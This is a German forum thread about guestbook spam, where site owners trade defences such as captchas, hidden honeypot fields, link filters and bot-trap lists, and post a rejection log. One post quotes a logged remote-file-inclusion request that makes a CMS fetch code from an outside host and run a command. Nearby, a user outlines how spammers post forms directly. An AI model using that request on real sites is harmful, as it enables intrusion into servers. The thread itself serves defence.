Die derzeitige Gästebuch-Spam-Attacke ...

[Persisteus]

Prüfen und freischalten... das stellt den schreibfreudigen Surfer, der ein Gästebuch ansteuert, unter Generalverdacht.

Ach wirklich? Guckst du nicht auch erst einmal aus dem Fenster, bevor du die Tür öffnest? Könnte ja entweder der Postbote oder die Zeugen Jehovas sein…
Auch öffnest ja DU die Tür, und nicht irgendein Automat, der z.B. versucht, Anhand des Nummernschildes des Autos die Identität der Person zu ermitteln.

Auch darf man nie vergessen: Man ist selbst für die Inhalte auf der Seite verantwortlich, und nicht irgendein Automat. Macht man also z.B. volksverhetzende Beiträge über seine Gästebuch öffentlich zugänglich (und kann sie nicht direkt löschen, weil man z.B. gerade schläft oder sich gerade im Urlaub befindet), dann kann das ganz schön Ärger geben und auch den Ruf bei den anderen Besuchern schädigen.

Das hat nichts mit Zensur zu tun. Das sollte man vielleicht so ähnlich wie Leserbriefe an eine Zeitschrift sehen. Da wird auch jeder Brief gelesen und überprüft, und nicht einfach so abgedruckt.

[Itzi]

Ich glaube für mich die Lösung gefunden zu haben, und möchte euch meine Erfahrungen nicht vorenthalten:

Captchas wollte ich lange nicht einsetzen, da ich das GB für normale Menschen recht attraktiv halten möchte. Hab mal probiert, mit Sessionvariablen usw. zu prüfen, ob es echte menschen sind, die schon vorher eine gewisse Zeit auf anderen Seiten meiner HP verweilt sind. Fazit: Etwa 90% der Attacken wurden abgewehrt, nach ein paar Wochen war aber das alte Level wieder erreicht.

Schlussendlich ist mir die Hutschnur geplatzt und ich habe ein Captcha eingesetzt. bild.php erzeugt das Bild und speichert den Code in einer Sessionvar.
Das GB überprüft ob der Code (POST=SESS) stimmt.
Ich war etwas enttäuscht, da etwa ein Viertel des SPAM durchkam. War aber mein Fehler. Ich hatte nämlich nicht bedacht, dass die Dinger mein Formular gar nicht aufrufen sondern nur ihren Scheiss per POST absenden.
0=0 ... eh klar - also habe ich noch strlen oder isset ergänzt. Das wars.
Nachdem ich aber die Nase voll hatte habe ich einen krassen Schritt gemacht, den ich mir schon lange überlegt hatte:

Mir ist aufgefallen, dass praktisch keiner meiner wirklichen Gäste einen Link hinterlassen will. Das GB ist ja eh nur für Grüße gut.
Und ohne Links machen SPAMs ja auch meist keinen Sinnn.
Also habe ich das Homepage-Feld versteckt - wer da was einträgt kommt nicht durch.
Weiters überprüfe ich, ob im Text ein Link steht.

Mit dieser - zugegeben krassen - Maßnahme hab ich endlich meine Ruhe - zumindest siehts bis jetzt sehr gut aus!

Aber auch das Captcha leistet jetzt gute Dienste.

Hier ein Auszug ausm Logfile:

Code:

14.08.2007 13:20:39-homepageform-linkintext-noicode
14.08.2007 13:21:25-homepageform-linkintext-noicode
14.08.2007 13:21:40-homepageform-linkintext-noicode
14.08.2007 13:23:01-homepageform-linkintext-noicode
14.08.2007 13:23:16-linkintext-wrongicode
14.08.2007 13:24:21-homepageform-linkintext-noicode
14.08.2007 13:24:29-homepageform-linkintext-noicode
14.08.2007 13:24:35-homepageform-linkintext-noicode
14.08.2007 13:24:46-homepageform-linkintext-noicode
14.08.2007 13:25:23-homepageform-linkintext-noicode
14.08.2007 13:26:48-homepageform-linkintext-noicode
14.08.2007 13:27:41-homepageform-linkintext-noicode
14.08.2007 13:28:59-homepageform-linkintext-noicode
14.08.2007 13:28:59-homepageform-linkintext-noicode
14.08.2007 13:29:02-homepageform-linkintext-wrongicode
14.08.2007 13:31:52-homepageform-linkintext-noicode
14.08.2007 13:31:57-homepageform-linkintext-wrongicode-noicode
14.08.2007 13:33:03-homepageform-linkintext-noicode
14.08.2007 13:34:18-homepageform-linkintext-noicode
14.08.2007 13:34:52-homepageform-linkintext-noicode
14.08.2007 13:38:30-homepageform-linkintext-noicode
14.08.2007 13:46:07-email-homepageform-linkintext-noicode
14.08.2007 13:46:32-homepageform-linkintext-noicode
14.08.2007 13:46:45-homepageform-linkintext-noicode
14.08.2007 13:46:49-homepageform-noicode
14.08.2007 13:47:17-homepageform-linkintext-noicode
14.08.2007 13:48:02-homepageform-noicode
14.08.2007 13:48:49-homepageform-noicode
14.08.2007 13:49:07-homepageform-linkintext-noicode
14.08.2007 13:49:43-homepageform-linkintext-noicode
14.08.2007 13:51:19-homepageform-wrongicode
14.08.2007 13:54:49-homepageform-linkintext-noicode
14.08.2007 13:57:38-homepageform-linkintext-noicode
14.08.2007 13:58:22-homepageform-noicode
14.08.2007 13:58:25-homepageform-linkintext-noicode
14.08.2007 14:00:41-homepageform-linkintext-noicode
14.08.2007 14:02:48-homepageform-noicode
14.08.2007 14:04:58-homepageform-linkintext-noicode
14.08.2007 14:05:35-homepageform-linkintext-noicode
14.08.2007 14:05:35-homepageform-linkintext-noicode
14.08.2007 14:05:55-homepageform-linkintext-noicode
14.08.2007 14:06:01-homepageform-linkintext-noicode
14.08.2007 14:06:36-homepageform-linkintext-noicode
14.08.2007 14:07:15-homepageform-linkintext-noicode
14.08.2007 14:09:28-homepageform-noicode
14.08.2007 14:09:34-homepageform-linkintext-noicode
14.08.2007 14:09:54-homepageform-noicode
14.08.2007 14:10:05-homepageform-noicode
14.08.2007 14:10:09-homepageform-linkintext-noicode
14.08.2007 14:10:12-homepageform-linkintext-noicode
14.08.2007 14:12:10-homepageform-linkintext-noicode
14.08.2007 14:12:11-homepageform-linkintext-noicode
14.08.2007 14:12:15-homepageform-linkintext-noicode
14.08.2007 14:12:15-homepageform-linkintext-noicode
14.08.2007 14:12:16-homepageform-linkintext-noicode
14.08.2007 14:12:17-homepageform-linkintext-noicode
14.08.2007 14:12:17-homepageform-linkintext-noicode
14.08.2007 14:12:18-homepageform-linkintext-noicode
14.08.2007 14:12:19-homepageform-linkintext-noicode
14.08.2007 14:12:19-homepageform-linkintext-noicode
14.08.2007 14:12:20-homepageform-linkintext-noicode
14.08.2007 14:12:20-homepageform-linkintext-noicode
14.08.2007 14:12:21-homepageform-linkintext-noicode
14.08.2007 14:12:22-homepageform-linkintext-noicode
14.08.2007 14:12:22-homepageform-linkintext-noicode
14.08.2007 14:12:28-homepageform-linkintext-noicode
14.08.2007 14:12:29-homepageform-linkintext-noicode
14.08.2007 14:12:29-homepageform-linkintext-noicode
14.08.2007 14:13:06-homepageform-linkintext-noicode
14.08.2007 14:13:07-homepageform-linkintext-noicode
14.08.2007 14:13:09-homepageform-linkintext-noicode
14.08.2007 14:13:10-homepageform-linkintext-noicode
14.08.2007 14:13:11-homepageform-linkintext-noicode
14.08.2007 14:13:11-homepageform-linkintext-noicode
14.08.2007 14:13:12-homepageform-linkintext-noicode
14.08.2007 14:13:12-homepageform-linkintext-noicode
14.08.2007 14:13:13-homepageform-linkintext-noicode
14.08.2007 14:13:14-homepageform-linkintext-noicode
14.08.2007 14:13:14-homepageform-linkintext-noicode
14.08.2007 14:13:15-homepageform-linkintext-noicode
14.08.2007 14:13:15-homepageform-linkintext-noicode
14.08.2007 14:13:16-homepageform-linkintext-noicode
14.08.2007 14:13:17-homepageform-linkintext-noicode
14.08.2007 14:13:17-homepageform-linkintext-noicode
14.08.2007 14:13:18-homepageform-linkintext-noicode
14.08.2007 14:13:19-homepageform-linkintext-noicode
14.08.2007 14:13:19-homepageform-linkintext-noicode
14.08.2007 14:13:20-homepageform-linkintext-noicode
14.08.2007 14:13:24-homepageform-linkintext-noicode
14.08.2007 14:13:26-homepageform-linkintext-noicode
14.08.2007 14:13:29-homepageform-linkintext-noicode
14.08.2007 14:13:33-homepageform-linkintext-noicode
14.08.2007 14:13:37-homepageform-linkintext-noicode
14.08.2007 14:13:37-homepageform-linkintext-noicode
14.08.2007 14:13:39-homepageform-linkintext-noicode
14.08.2007 14:13:41-homepageform-linkintext-noicode
14.08.2007 14:13:42-homepageform-linkintext-noicode
14.08.2007 14:13:44-homepageform-linkintext-noicode
14.08.2007 14:13:45-homepageform-linkintext-noicode
14.08.2007 14:15:24-homepageform-linkintext-noicode
14.08.2007 14:16:17-homepageform-linkintext-noicode
14.08.2007 14:18:03-homepageform-linkintext-noicode
14.08.2007 14:19:21-homepageform-linkintext-noicode
14.08.2007 14:28:13-homepageform-linkintext-noicode
14.08.2007 14:29:19-homepageform-linkintext-noicode
14.08.2007 14:29:48-homepageform-linkintext-noicode
14.08.2007 14:33:37-homepageform-linkintext-noicode
14.08.2007 14:36:22-homepageform-linkintext-noicode
14.08.2007 14:37:44-homepageform-linkintext-noicode
14.08.2007 14:38:08-email-homepageform-linkintext-noicode
14.08.2007 14:38:26-homepageform-noicode
14.08.2007 14:42:28-homepageform-linkintext-noicode
14.08.2007 14:43:09-homepageform-linkintext-noicode
14.08.2007 14:43:19-homepageform-linkintext-noicode
14.08.2007 14:43:38-homepageform-linkintext-noicode
14.08.2007 14:44:56-homepageform-noicode
14.08.2007 14:49:58-homepageform-noicode
14.08.2007 14:50:19-homepageform-noicode
14.08.2007 14:51:34-homepageform-linkintext-noicode
14.08.2007 14:51:38-homepageform-linkintext-noicode
14.08.2007 14:52:45-homepageform-linkintext-noicode
14.08.2007 14:52:46-homepageform-linkintext-noicode
14.08.2007 14:54:34-homepageform-linkintext-noicode
14.08.2007 14:56:34-homepageform-wrongicode
14.08.2007 14:57:06-homepageform-linkintext-noicode
14.08.2007 14:58:10-homepageform-noicode
14.08.2007 15:01:26-homepageform-linkintext-noicode
14.08.2007 15:02:14-email-homepageform-linkintext-noicode
14.08.2007 15:03:40-homepageform-noicode
14.08.2007 15:04:04-homepageform-noicode
14.08.2007 15:05:25-homepageform-linkintext-noicode
14.08.2007 15:07:25-homepageform-linkintext-noicode
14.08.2007 15:09:29-homepageform-linkintext-noicode
14.08.2007 15:11:23-homepageform-noicode
14.08.2007 15:12:00-homepageform-noicode
14.08.2007 15:12:28-homepageform-noicode
14.08.2007 15:12:50-homepageform-linkintext-wrongicode
14.08.2007 15:22:40-homepageform-linkintext-noicode
14.08.2007 15:23:05-homepageform-linkintext-noicode
14.08.2007 15:23:31-homepageform-linkintext-noicode
14.08.2007 15:29:34-homepageform-linkintext-noicode
14.08.2007 15:29:46-homepageform-linkintext-noicode
14.08.2007 15:30:31-email-homepageform-linkintext-noicode
14.08.2007 15:32:13-homepageform-noicode
14.08.2007 15:33:00-homepageform-linkintext-noicode
14.08.2007 15:33:47-homepageform-linkintext-noicode
14.08.2007 15:35:26-homepageform-linkintext-noicode
14.08.2007 15:37:14-homepageform-linkintext-wrongicode
14.08.2007 15:39:20-homepageform-linkintext-noicode
14.08.2007 15:40:33-homepageform-linkintext-noicode
14.08.2007 15:42:22-homepageform-noicode
14.08.2007 15:42:43-homepageform-noicode
14.08.2007 15:44:29-homepageform-noicode
14.08.2007 15:45:19-homepageform-linkintext-noicode
14.08.2007 15:45:37-homepageform-linkintext-noicode
14.08.2007 15:45:54-homepageform-linkintext-noicode
14.08.2007 15:46:02-homepageform-linkintext-noicode
14.08.2007 15:46:40-homepageform-linkintext-noicode
14.08.2007 15:49:17-homepageform-linkintext-noicode
14.08.2007 15:49:18-homepageform-linkintext-noicode
14.08.2007 15:50:03-homepageform-linkintext-noicode
14.08.2007 15:50:12-homepageform-linkintext-noicode
14.08.2007 15:50:14-homepageform-linkintext-wrongicode
14.08.2007 15:52:52-homepageform-linkintext-noicode
14.08.2007 15:56:31-homepageform-linkintext-noicode
14.08.2007 16:01:24-homepageform-noicode
14.08.2007 16:01:48-homepageform-noicode
14.08.2007 16:02:04-homepageform-linkintext-noicode
14.08.2007 16:02:26-homepageform-noicode
14.08.2007 16:02:47-homepageform-noicode
14.08.2007 16:03:14-homepageform-wrongicode
14.08.2007 16:03:21-homepageform-linkintext-noicode
14.08.2007 16:06:03-homepageform-linkintext-noicode
14.08.2007 16:09:59-homepageform-linkintext-noicode
14.08.2007 16:11:50-homepageform-linkintext-noicode
14.08.2007 16:14:22-homepageform-linkintext-noicode
14.08.2007 16:14:37-homepageform-linkintext-noicode
14.08.2007 16:16:32-homepageform-linkintext-noicode
14.08.2007 16:17:36-homepageform-linkintext-noicode
14.08.2007 16:17:59-homepageform-linkintext-noicode
14.08.2007 16:18:10-homepageform-linkintext-noicode
14.08.2007 16:18:29-homepageform-linkintext-noicode
14.08.2007 16:18:45-homepageform-linkintext-noicode
14.08.2007 16:18:50-homepageform-linkintext-noicode
14.08.2007 16:19:08-homepageform-linkintext-noicode
14.08.2007 16:19:39-homepageform-linkintext-noicode
14.08.2007 16:20:27-homepageform-linkintext-noicode
14.08.2007 16:23:05-email-homepageform-linkintext-noicode
14.08.2007 16:23:49-homepageform-linkintext-noicode
14.08.2007 16:23:56-homepageform-linkintext-noicode
14.08.2007 16:24:56-homepageform-linkintext-noicode
14.08.2007 16:27:46-homepageform-linkintext-noicode
14.08.2007 16:28:38-homepageform-linkintext-noicode
14.08.2007 16:28:43-homepageform-linkintext-noicode
14.08.2007 16:29:33-homepageform-linkintext-noicode
14.08.2007 16:29:48-homepageform-linkintext-noicode
14.08.2007 16:30:13-homepageform-linkintext-noicode
14.08.2007 16:30:15-homepageform-linkintext-noicode
14.08.2007 16:30:17-homepageform-linkintext-noicode
14.08.2007 16:30:27-homepageform-linkintext-noicode
14.08.2007 16:30:40-homepageform-linkintext-noicode
14.08.2007 16:30:42-homepageform-linkintext-noicode
14.08.2007 16:30:47-homepageform-linkintext-noicode
14.08.2007 16:30:50-homepageform-linkintext-noicode
14.08.2007 16:31:50-homepageform-linkintext-noicode
14.08.2007 16:32:33-homepageform-linkintext-noicode
14.08.2007 16:33:52-homepageform-linkintext-noicode
14.08.2007 16:35:09-homepageform-linkintext-noicode
14.08.2007 16:35:20-homepageform-linkintext-noicode
14.08.2007 16:36:42-homepageform-linkintext-noicode
14.08.2007 16:37:43-homepageform-linkintext-noicode
14.08.2007 16:37:44-homepageform-linkintext-noicode
14.08.2007 16:38:08-homepageform-linkintext-noicode
14.08.2007 16:38:19-homepageform-linkintext-noicode
14.08.2007 16:38:55-homepageform-linkintext-noicode
14.08.2007 16:40:09-homepageform-linkintext-noicode
14.08.2007 16:43:15-homepageform-linkintext-noicode
14.08.2007 16:43:20-homepageform-linkintext-noicode
14.08.2007 16:45:26-homepageform-noicode
14.08.2007 16:46:26-homepageform-noicode
14.08.2007 16:49:03-homepageform-linkintext-noicode
14.08.2007 16:49:46-homepageform-linkintext-noicode
14.08.2007 16:50:16-homepageform-linkintext-noicode
14.08.2007 16:50:31-email-homepageform-linkintext-noicode
14.08.2007 16:50:46-homepageform-noicode
14.08.2007 16:51:33-homepageform-noicode
14.08.2007 16:54:32-homepageform-linkintext-noicode
14.08.2007 16:54:56-homepageform-noicode
14.08.2007 16:55:14-homepageform-noicode
14.08.2007 16:58:04-homepageform-linkintext-noicode
14.08.2007 16:58:57-homepageform-linkintext-noicode
14.08.2007 17:01:10-homepageform-linkintext-noicode
14.08.2007 17:01:57-homepageform-noicode
14.08.2007 17:03:58-homepageform-noicode
14.08.2007 17:05:57-homepageform-linkintext-noicode
14.08.2007 17:08:48-homepageform-wrongicode
14.08.2007 17:09:07-homepageform-linkintext-wrongicode
14.08.2007 17:10:37-homepageform-linkintext-wrongicode
14.08.2007 17:12:10-homepageform-noicode
14.08.2007 17:12:14-homepageform-linkintext-wrongicode
14.08.2007 17:12:40-homepageform-linkintext-noicode
14.08.2007 17:13:37-homepageform-linkintext-noicode
14.08.2007 17:18:09-homepageform-noicode
14.08.2007 17:18:13-homepageform-linkintext-wrongicode
14.08.2007 17:20:15-homepageform-linkintext-noicode
14.08.2007 17:24:02-homepageform-linkintext-wrongicode
14.08.2007 17:24:05-homepageform-linkintext-noicode
14.08.2007 17:25:48-homepageform-linkintext-wrongicode
14.08.2007 17:25:58-homepageform-linkintext-noicode
14.08.2007 17:27:39-homepageform-linkintext-noicode
14.08.2007 17:28:10-homepageform-linkintext-wrongicode
14.08.2007 17:32:27-homepageform-linkintext-noicode
14.08.2007 17:34:22-homepageform-linkintext-noicode
14.08.2007 17:35:00-homepageform-linkintext-noicode
14.08.2007 17:35:10-homepageform-linkintext-noicode
14.08.2007 17:35:29-homepageform-linkintext-noicode
14.08.2007 17:35:59-homepageform-linkintext-wrongicode
14.08.2007 17:36:03-homepageform-linkintext-noicode
14.08.2007 17:36:36-homepageform-linkintext-wrongicode

(icode ist der Captchacode)

Vielleicht versuche ich es wieder mal ohne Captcha. Mal sehen.
Eine Warteschleife werde ich auch noch einbauen. Allerdings nur eine sehr kleine, dass es der wartende Bot nicht merkt nicht irgendwann aufhört auf die Antwortseiten der GB zu warten.

[camworks]

tach,

es gibt für gästebücher und andere gelegenheiten auch bot-fallen, wie die von [Link nur für registrierte Mitglieder sichtbar. ] ... das ist ein kostenloses gemeinschaftsprojekt und wird von vielen usern mit spammer-daten gefüttert (die überprüft werden). ich selbst habe die bot-trap auf mehreren domains am laufen und bin so nebenbei auch wieder frei von hijackern und anderem gesindel.

ich kann jedem nur raten, sich das mal näher anzuschauen!

[rsWhite]

Also ich beschäftige mich auch schon länger mit Methoden zur Spamabwehr und habe auf meinem Blog eine [Link nur für registrierte Mitglieder sichtbar. ] zusammengestellt.
Ebenfalls programmiere ich gerade ein Framework was Spam erkennen und abwenden soll und teils sogar lernfähig ist, das ganze wird wohl morgen downloadbar sein, war die letzten 2 Tage zu faul eine Readme zu schreiben damit jeder damit klarkommt.

[ma1936]

Hallo an alle Hilfswilligen,
leider wird eine von mir betreute Homepage seit einigen Tagen zugemüllt. Ich versuche mit meinen bescheidenen Programmierkenntnissen etwas dagegen zu tun. Meine erste Maßnahme "Captcha" hat leider nicht gegriffen. Bei meinem bemühen mich in die Problematik etwas einzuarbeiten, bin ich auf die Ausführungen von Spastispam von 07,.03.06 gestossen. Wie ist das mit dem angeführen Code zu verstehen. Ich habe einmal Domain, Ordnername des Gästebuchs, Dateiname der entsprechenden Datei mit realen Daten meiner Homepage ersetzt. Wenn ich den Code in die Adresszeile des Browsers eingebe, lande ich zwar bei meinem Formular zur Eingabe des Gästebucheintrags, aber eingetragen ist dort nichts. Wenn das so funktionieren würde, wie beschrieben, dann wäre doch ein bescheidener Schutz schon gegeben, wenn man den Gästebuchordner und den Dateien irreführende Namen gibt. Frage, woher nehme die Spamer die Bezeichnungen der relevanten Ordner und Dateien bei meinem Provider? Oder sehe ich das zu einfach. Kann mir jemand Hinweise geben, die auch einer, der nur Grundkenntnisse in PHP hat, verstehen und ausführen kann? Dafür schon mal meinen Dank

[Nordin]

Frage, woher nehme die Spamer die Bezeichnungen der relevanten Ordner und Dateien bei meinem Provider? Oder sehe ich das zu einfach. Kann mir jemand Hinweise geben, die auch einer, der nur Grundkenntnisse in PHP hat, verstehen und ausführen kann? Dafür schon mal meinen Dank

Ist im grunde einfach... Ich schaue mir an was du für ein Forum (Gästebuch) hast... installiere mir das und schaue mir den quelltext an der für das eintragen des posts zuständig ist... danach baue ich mir das script nach und trage in dem formular unter <form> deine url ein... dann klicke ich auf senden... zack bum steht er bei dir drin *g* das sind riesen lücken die php-progger vernachlässigen...

Versendet wird das formular übrigens per POST wenn du direkt was im Browsereingibst ist das GET...

Was Captcha angeht, das ist auch schon teilweise kein hinderniss mehr... cleverer sind da schon dynamische fragen die nur ein mensch beantworten kann wie z.B. "um wieviel uhr ist mittag?" oder sowas...

Also man sollte immer die $_POST variablem überprüfen... wenn dort ein spamwort erkannt wird blocke und logge die ip und alle anderen wichtigen daten... (sorry dass ich es jetzt hier wieder mache aber) schau dir mal [Link nur für registrierte Mitglieder sichtbar. ] an das ist ein tool welches du in alle beliebigen scripte einbauen kannst... für die meisten Foren funktioniert auch der spamfilter sauber... ab der version v1.6 wird die von mir angesprochene $_POST variable immer überprüft... so kann nur spam eingetragen werden wer noch nicht bekannt ist...

Merke:
Es gibt keinen 100%igen schutz vor SPAM!!!

[Itzi]

Meine erste Maßnahme "Captcha" hat leider nicht gegriffen.

Überprüfe mal, ob sich nicht irgend ein doofer Fehler beim Einbauen des Captchas eingeschlichen hat. Ich bin eigentlich auch sehr erfahren in PHP, aber ich denke auch nicht immer an alles.

Ich war sehr verblüfft als mein Captcha nicht funktioniert hat. Ich hatte nur überprüft ob das Captcha richtig ist. Wird aber mein Formular gar nicht ausgegeben - damit wird die Datei chapcha_img.php (sondern gleich gepostet), wird ist aber Sessionvariable leer. also war $captcha=$_POST['captcha']=''
Eine Zusätzliche Überprüfung mit strlen() hats dann gebracht. Seither ist mein GB spamfrei.

Noch ein Tipp:
Das Captcha wurde bei neuaufrufen des Formulars nicht immer neu geladen - es war ja noch im Cache des Browsers. Also war der Code noch der Gleiche...
Ein beliebiger, sich ändernder Parameter hat das gelöst:
chapcha_img.php?time=1025545165

[schmubo]

In meinen Server-Statistiken tauchen immer wieder eigenartige Einträge auf, die sehr gezielte Zugriffe auf nicht existierende Dateien protokollieren. So verlangt zum Beispiel ein Request die Datei /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://englishforbusinessonline.com/tool20.dat?&list=1&cmd=id.

Aha! Da versucht also jemand, mittels Skript ins tiefste Innere eines CMS einzudringen. Weil sich

• diese Vorfälle in letzter Zeit häufen und
• Spammerfoppen zu einem meiner Hobbys entwickelt hat

möchte ich den Aggressoren Daten zurückliefern, an denen sich ihre Software verschluckt. Dazu muss ich aber wissen, wie diese Software arbeitet. Deshalb meine Frage: Gibt es so etwas wie ein Standard-Programm, mit dem die Mehrzahl der Foren- und Gästebuch-Spammer erbeitet? Bitte schiebt Informationen rüber - ich brenne darauf, den Spammern ein wenig Sand ins Getriebe zu streuen...

Schöne Grüße
schmubo

[Foxi]

Hi,

zur Zeit bekomme ich fast zwei Einträge pro Tag mit folgendem Inhalt.

Thema: DcufMDPfqYFVgUUm

Kommentar: with significant obesity; [Modedit]Hier waren jede menge Links, die wir uns nicht antun müssen und das Whois-Setzen ist in keinem Verhältnis zum Nutzen[/Modedit]

E-Mail: [Link nur für registrierte Mitglieder sichtbar. ]

Ich hoffe doch das Puretec da schnellst möglichst was macht!!

Gruß Foxi

[Q__]

Ich hoffe doch das Puretec da schnellst möglichst was macht!!

Wieso sollte Puretec da was machen? Die hosten Deine Seite m.E. doch nur, oder sehe ich das falsch?
Der Betreiber des Gästebuchs bist letztendlich doch Du?

Wenn jede Nacht jemand die Luft aus Deinen Auto-Reifen lässt, wendest Du Dich doch auch nicht an Opel (VW, Mercedes, Honda, .... )?!

Insofern liegt es an Dir, entsprechende Maßnahmen zu ergreifen...

Gruß,
Q